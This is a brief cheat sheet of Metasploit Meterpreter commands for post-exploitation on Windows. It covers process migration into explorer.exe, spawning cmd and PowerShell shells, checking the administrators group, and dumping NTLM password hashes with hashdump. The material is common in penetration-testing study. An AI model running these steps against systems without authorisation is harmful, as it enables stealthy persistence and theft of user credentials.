# Metasploit

## Post Exploitation Workflow

```python
getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe process
```

## Check group members

```python
net localgroup adminstrators
```

## Load Powershell Extension

Spawn a powershell.exe in your meterpreter session, just like running **shell** command to spawn cmd.exe in your session

```python
meterpreter> load powershell
meterpreter> powershell_shell
```

## Dump windows users NTLM hashes

```python
meterpreter> hashdump
```

##
